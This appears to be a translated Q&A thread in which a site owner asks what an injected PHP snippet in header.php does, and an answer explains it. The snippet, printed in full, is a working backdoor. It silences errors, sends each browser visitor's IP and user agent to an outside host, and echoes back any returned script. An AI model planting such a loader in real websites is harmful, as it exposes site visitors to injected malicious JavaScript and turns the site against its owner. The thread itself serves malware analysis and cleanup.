PHP Hack - 这段代码在做什么？

Question

Avast 不时出现在我的一个网站上。有点奇怪，因为我对安全性非常严格，但我检查了 index.php 文件和所有相关的包含和脚本。在我删除的“header.php”文件中发现了一些奇怪的 PHP 代码。

今晚，avast 再次弹出，尽管我的 FTP 数据显示该文件“自从我修复它后就没有被编辑过”，但代码又出现了。我现在已经更改了密码和所有其他内容。

这是有问题的 PHP 代码，任何关于这到底在做什么的建议都会很好!

<?php

$wp_bskr = 'inf';
$wp_tcc = 'template';
error_reporting(0);
ini_set('display_errors',0);
$wp_hrmr = @$_SERVER['HTTP_USER_AGENT'];

if (( preg_match ('/Gecko|MSIE/i', $wp_hrmr) && !preg_match ('/bot/i', $wp_hrmr))) {
    $wp_drss="http://".$wp_tcc.$wp_bskr.".com/".$wp_bskr."/?ip=".$_SERVER['REMOTE_ADDR']."&referer=".urlencode($_SERVER['HTTP_HOST'])."&ua=".urlencode($wp_hrmr);

    $ch = curl_init();
    curl_setopt ($ch, CURLOPT_URL,$wp_drss);

    curl_setopt ($ch, CURLOPT_TIMEOUT, 10);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
    $wp_wvw = curl_exec ($ch);
    curl_close($ch);
}

if ( substr($wp_wvw,1,3) === 'scr' ) {
    echo $wp_wvw;
}
?>

********* 更新************

感谢 esqew 更深入地研究这个问题并在您的博文中提供详细信息。确实是可怕的东西。我这边有一些更新要告诉你。

首先，使用 avast 日志(从我的网站被检测到有恶意软件时开始)，通过谷歌进行一些搜索，我发现了另一个非常相似的代码示例，我这边 avast 标记的 IP 地址与这篇文章相匹配问题。此处提供了一些信息以缩小范围:malware-traffic-analysis.n*t/2014/05/11/index.html.无论如何，我认为那是帖子。论坛的新手，不确定我是否可以发布链接，所以我给“net”顶级域名加了星标。

从那里，我获取了匹配的 IP，一个包含 javascript 的 url，whois'd 并将所有信息传递给注册商。他们从他们那端看了一下，确认存在恶意行为，令我惊讶的是，他们在一个小时内回复并暂停了域和所有连接到该 IP 的域。

其次，我的虚拟主机发现了他们认为泄漏是如何实现的。没有提供完整的深度细节，我意识到我有一个旧的 wordpress 安装(我的意思是旧的，一个我多年没有使用和忘记的，自 2010 年以来没有更新，所以我认为很容易受到攻击)。从他们的日志来看，这似乎是进入我的服务器的方式，因为我没有安装其他脚本。从几天前开始，我更改了所有密码并完全删除了 WP，因为它不再使用并且目前一切正常。

Answer 1

看起来是某种后门，我们可以进一步探索。前几行似乎设置了一些变量，使代码更难阅读/检测:

$wp_bskr = 'inf'; // simple string settings
$wp_tcc = 'template'; // simple string settings
error_reporting(0); // making errors silent, so they are close to undetectable
ini_set('display_errors',0); // making errors silent, so they are close to undetectable
$wp_hrmr = @$_SERVER['HTTP_USER_AGENT']; // grab the user-agent string from the requesting party

然后它会根据这些字符串构建一个 URL:

http://templateinf.com/inf/?...

...其中包含有关您的用户代理、您的 IP 地址和它来自的页面的大量信息。

然后它在 $wp_hrmr 上运行一个正则表达式变量(您的用户代理字符串)来检查它是 Gecko 还是 MSIE 并且不包含“bot”(带有草率、不必要的括号，我已经清理了一下):

if (preg_match('/Gecko|MSIE/i', $wp_hrmr) && !preg_match('/bot/i', $wp_hrmr)) {

如果满足这些条件，它会创建一个 cURL 请求到它之前创建的骨架 URL:

$ch = curl_init();
curl_setopt ($ch, CURLOPT_URL,$wp_drss);
curl_setopt ($ch, CURLOPT_TIMEOUT, 10);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$wp_wvw = curl_exec ($ch);
curl_close($ch);

然后查看输出，如果它在字符串的特定点包含字符串“scr”，则为 echo将输出返回给浏览器:

if ( substr($wp_wvw,1,3) === 'scr' ){ echo $wp_wvw; }

根据我个人的判断，这是一个自动化工具放置在那里的东西，要么收集模板的使用统计信息(从 URL 中扣除)，要么提醒中央服务器它报告的端点容易受到攻击某些漏洞利用(或者可能是两者的结合)。然而，它似乎还没有混淆到足以证明其被归类为恶意软件的程度，而且它的人类可读性也不足以证明它是合法的。它的错误沉默代码肯定指向前者，但它 echo s 输出到缓冲区。无论哪种方式，它都是一段特殊的代码。 有关更多信息，请参阅下面的更新

然而，这是一个巨大的安全风险，您需要立即联系您的托管服务提供商，因为您的托管网络上可能存在比您的站点更大的问题。虽然这段特殊的代码没有做任何特别恶意的事情，但它仍然是一个风险，应该在您继续执行任何其他操作之前及时处理。

正如@Jonathan 在 OP 的评论中提到的，您网站上出现的任何您未编写的代码都应该接受严格检查。

---

更新

在 writing this up 之后今晚我正在进行一个博客实验，我在理解这个恶意软件方面取得了长足的进步。

在没有看到您当前的服务器配置的情况下，我很难弄清楚这段代码最初是如何进入您的环境的。不过，我可以肯定地说，这段代码将在未来的某个时候用于大规模 XSS 攻击。

字母scr提示我 cURL 请求的输出内容最终将包含此字符串，这是过滤不以 <script> 开头的输出的简单方法。 .

一旦攻击者在其端激活包含，服务器很可能会开始使用基于 Javascript 的代码回复请求，并在客户端访问网站时对其进行攻击。攻击者可能正在等待一个广泛传播的 Javascript 引擎错误的发布，他们可以利用这些错误来做比 XSS 更多的恶意事情(可能像远程代码执行)。

如果有足够多的受感染服务器，攻击者就可以利用这些后门来做任何事情:Javascript-based Bitcoin mining , Javascript-based DDOS等